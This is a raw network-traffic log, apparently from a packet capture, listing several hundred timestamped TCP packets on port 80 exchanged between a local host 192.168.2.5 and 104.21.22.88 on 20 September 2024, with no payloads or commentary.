                                                              Sep 20, 2024 12:00:07.176165104 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.176187992 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.176201105 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:07.176204920 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.176219940 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.176235914 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.176238060 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:07.176251888 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.176256895 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:07.176297903 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.176305056 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:07.176312923 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.176345110 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.176347971 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:07.176367998 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.176383018 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.176394939 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.176409006 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:07.176409960 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.176434994 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:07.176434994 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.176451921 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.176471949 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:07.176481962 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.176497936 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.176512003 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.176522970 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:07.176527023 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.176542997 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.176548958 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:07.176578045 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:07.176588058 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.176610947 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.176625013 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.176639080 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.176647902 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:07.176666021 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.176681042 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.176682949 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:07.176697969 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.176712990 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.176722050 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:07.176728964 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.176745892 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.176750898 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:07.176784992 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:07.176789045 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.176803112 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.176826000 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.176843882 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:07.176848888 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.176866055 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.176881075 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.176887035 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:07.176897049 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.176908970 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.176922083 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:07.176949024 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:07.263736963 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.263778925 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.263796091 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.263812065 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.263827085 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.263840914 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.263855934 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.263870001 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:07.263873100 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.263890028 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.263942003 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:07.263962984 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:07.264120102 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.264137030 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.264161110 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.264174938 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.264178038 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:07.264192104 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.264202118 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:07.264208078 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.264224052 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.264239073 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.264252901 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.264266968 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.264273882 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:07.264280081 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:07.264286041 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.264302015 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.264311075 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:07.264317989 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.264323950 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:07.264334917 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.264357090 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:07.264504910 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.264519930 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.264533997 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.264548063 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.264555931 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:07.264571905 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.264588118 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.264601946 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.264602900 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:07.264621973 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:07.264642954 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:07.264671087 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.264686108 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.264700890 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.264714956 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.264727116 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:07.264734983 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.264748096 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:07.264749050 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.264765978 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.264780045 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.264787912 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:07.264806986 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.264815092 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:07.264825106 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.264841080 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.264857054 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.264872074 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:07.264873028 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.264889956 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.264894962 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:07.264906883 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.264928102 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:07.264969110 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.264983892 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.264998913 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.265007973 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:07.265017033 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.265033960 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.265036106 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:07.265073061 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:07.265117884 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.265134096 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.265147924 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.265172005 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:07.265317917 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.265335083 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.265347958 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.265362978 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.265377045 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.265381098 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:07.265393019 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.265434027 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:07.265444994 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:07.265448093 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.265464067 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.265477896 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.265482903 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:07.265496016 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.265516996 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:07.265619993 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.265635967 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.265650988 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.265666008 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.265671968 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:07.265677929 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:07.265682936 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.265698910 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.265713930 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.265719891 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:07.265784979 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:07.267370939 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.267395973 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.267415047 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.267436028 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:07.267548084 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.267564058 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.267580032 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.267589092 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:07.267597914 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.267615080 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.267630100 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.267653942 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:07.267671108 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:07.267709017 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.267724991 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.267740011 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.267748117 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:07.267755985 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.267771959 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.267780066 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:07.267806053 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:07.267898083 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.267913103 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.267926931 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.267940998 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.267950058 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:07.267957926 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.267972946 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.267987013 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.268001080 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:07.268002033 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.268014908 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:07.268018961 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.268034935 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:07.268054962 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.268091917 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:07.268107891 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.268124104 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.268140078 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.268153906 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.268167973 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:07.268168926 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.268184900 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.268189907 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:07.268203020 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.268223047 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:07.268233061 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.268256903 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.268271923 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.268273115 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:07.268290043 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.268302917 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.268306017 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:07.268320084 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.268336058 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.268338919 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:07.268352032 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.268373966 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:07.268400908 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.268416882 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.268430948 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.268439054 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:07.268445969 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.268461943 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.268467903 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:07.268497944 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:07.354345083 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.354377985 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.354393959 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.354408979 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.354424953 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.354439020 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.354454041 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.354469061 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.354492903 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.354507923 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.354532957 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.354541063 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:07.354557991 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.354573965 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.354579926 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:07.354590893 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.354600906 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:07.354608059 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.354631901 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.354638100 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:07.354649067 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.354664087 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.354674101 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:07.354679108 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.354698896 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.354707003 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:07.354737997 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:07.354753017 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.354770899 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.354784966 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.354799986 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.354813099 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:07.354813099 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.354830027 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.354840040 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:07.354844093 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.354868889 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.354876995 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:07.354885101 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.354901075 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.354912043 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:07.354916096 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.354931116 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.354942083 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:07.354958057 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.354974031 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.354974985 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:07.354990005 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.355005980 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.355017900 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:07.355022907 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.355037928 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.355051041 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:07.355067015 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.355078936 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:07.355086088 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.355101109 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.355123043 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:07.355124950 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.355150938 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.355166912 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.355166912 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:07.355182886 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.355199099 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.355210066 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:07.355215073 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.355232954 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.355238914 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:07.355257034 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.355272055 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.355274916 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:07.355289936 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.355304003 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.355309963 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:07.355319977 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.355335951 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.355340004 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:07.355353117 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.355370998 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.355376959 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:07.355400085 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.355410099 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:07.355417013 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.355431080 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.355444908 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.355457067 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:07.355462074 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.355478048 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.355480909 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:07.355494976 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.355509996 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.355515957 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:07.355530977 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.355545998 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.355552912 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:07.355562925 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.355577946 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.355581999 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:07.355595112 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.355611086 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.355627060 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.355628014 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:07.355643034 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.355654955 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:07.355659962 CEST8049724104.21.22.88192.168.2.5
